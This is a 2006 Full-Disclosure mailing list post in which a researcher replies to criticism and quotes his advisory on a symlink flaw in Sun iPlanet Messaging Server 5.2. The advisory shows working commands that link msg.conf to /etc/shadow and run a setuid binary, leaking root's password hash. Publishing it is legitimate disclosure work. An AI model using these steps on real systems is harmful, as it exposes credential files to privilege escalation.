lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Sat Jun 17 21:26:13 2006 From: very at unprivate.com (php0t) Subject: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise] Excuse me, but what have I done to you? And why am I only supposed to disclose bugs when somebody pays me for it ? Can you please explain your rant, so next time I can do -whatever- different? And by the way, I'm not 'trying to prove I can find holes', I didn't spend any time trying to find a hole in this specific software, I just happened to stumble upon it in the process of trying to gain root - after which I decided to disclose this silly and obvious bug. So I ask again, is this a problem for you? Am I being ignorant / evil for posting this vuln? Just tell me what's up - If your problem is that I do not get paid for this - well - I am happy that you are so much after what's best for me but I can do fine on my own - thanks. php0t / zorro.hu > You are wasting your time trying to prove you can find holes in software that you AREN'T *PAID FOR* FINDING BUGS. > Nice advisory, though. you spend time on it. > Sincerely, > T.Solo php0t wrote: > Summary > ---------------- > Date: 14 Jun 2006 > Vendor: Sun Microsystems, Inc. > Name: iPlanet Messaging Server > Version: 5.2 HotFix 1.16 (built May 14 2003) > Vuln: msg.conf symlink attack > Severity: high > > > Software description > ---------------- > The iPlanet Messaging Server is a software product that provides a > centralized location for the exchange of information through the > sending and receiving of messages. The product is designed for > telecommunications providers, service providers, and enterprises that > offer messaging capabilities to employees, partners, and customers. > The iPlanet Messaging Server delivers a Web-based messaging platform > capable of serving tens of millions of users, and also provides > value-added differentiated services, including outsourcing, wireless > ,and unified messaging services. > > > Vulnerability desciption > ---------------- > Setuid programs part of the iPlanet Messaging Server try to read the > configuration file msg.conf. If the environment variable CONFIGROOT is > set, the configuration is read from that directory. > A symlink attack is possible, and as a result it is possible to read the > first line of any file with uid=0. > > > Example > ---------------- > test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version > iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) > libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox > 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris > test@...box:/tmp$ > test@...box:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master > -rws--s--x 1 root mail 446864 Sep 22 2005 > /iplanet/iMS5/bin/msg/imta/bin/pipe_master > test@...box:/tmp$ > test@...box:/tmp$ ln -s /etc/shadow msg.conf > test@...box:/tmp$ > test@...box:/tmp$ export CONFIGROOT=. > test@...box:/tmp$ > test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master > [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error: > func=_configdrv_file_readoption; error=option name should be followed by > '='; line=root:qW1HFEa1MCD0w:11821:::::: > ERROR: Configuration database initialization failed - see default > logfile > test@...box:/tmp$ > > > Vulnerable > ---------------- > iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003) > > php0t / zorro.hu > www.zorro.hu > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
Powered by blists - more mailing lists